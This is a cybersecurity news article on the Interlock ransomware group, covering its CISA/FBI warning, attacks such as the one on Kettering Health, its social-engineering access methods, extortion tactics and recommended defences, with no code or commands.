The Interlock ransomware attacks are escalating. A joint warning from CISA, the FBI, and the US Department of Homeland Security confirms that the group is aggressively targeting critical sectors across North America and Europe.
The gang is known for double extortion, new remote access trojan (RAT) variants, and advanced social engineering tactics. Its victims include hospitals, government agencies, manufacturers, and schools.
A Fast-Rising Threat
First seen in late 2024, Interlock has rapidly evolved. The group’s most high-profile hit so far was a May 2025 attack on Kettering Health, which:
- Paralyzed 14 medical centers
- Canceled thousands of procedures
- Involved 1 terabyte of exfiltrated data
“These actors are opportunistic and financially motivated,” said CISA.
“They disrupt essential services for maximum leverage.”
How Interlock Gains Access
Interlock uses drive-by downloads, posing as fake Chrome or Edge updates. Attackers hide the malware behind spoofed browser alerts on compromised websites.
Key attack methods include:
- ClickFix: Fake CAPTCHAs instruct users to open
Run, paste malicious PowerShell commands - Impersonation: RATs disguised as IT tools
- Command & Control (C2) via Cobalt Strike and AnyDesk
New RAT Variant Spotted
The group has upgraded from JavaScript to a new PHP-based RAT, first seen in June 2025. It’s part of a broader Kongtuke FileFix campaign, according to DFIR Report and Proofpoint.
Once inside, the group typically:
- Installs LumanStealer and a keylogger
- Harvests credentials
- Moves laterally for deeper access
Encryption, Extortion, and the Onion Blog
Interlock ransomware encrypts both Windows and Linux systems, appending .interlock or .1nt3rlock to affected files.
Victims receive ransom notes directing them to the group’s “Worldwide Secrets Blog” on the dark web. There, they’re told to pay in Bitcoin or risk public exposure of stolen data.
Victims are given 96 hours to comply. Interlock warns that using recovery tools or rebooting systems may cause permanent data loss.
Is Interlock Linked to Rhysida?
Security analysts believe Interlock may be a splinter group of the Russia-linked Rhysida gang. The similarities in encryption tools, RAT behavior, and extortion tactics are striking.
Since January 2025, the group has claimed at least 35 victims, with over half in the last six weeks, according to Cybernews.
What Organizations Should Do
CISA urges immediate action, recommending:
- Robust EDR solutions
- Frequent patching
- Multi-factor authentication
- Strict network segmentation
Swimlane’s Nick Tausek also emphasizes employee awareness:
“Social engineering is the soft spot. Training users is just as critical as patching firewalls.”
Conclusion
The spike in Interlock ransomware attacks shows how fast today’s threats evolve. With advanced tactics and fast-moving campaigns, organizations must stay ahead with layered defenses, clear procedures, and trained staff. Because in 2025, ransomware doesn’t knock—it clicks.
0 responses to “Interlock Ransomware Attacks Surge Across North America and Europe”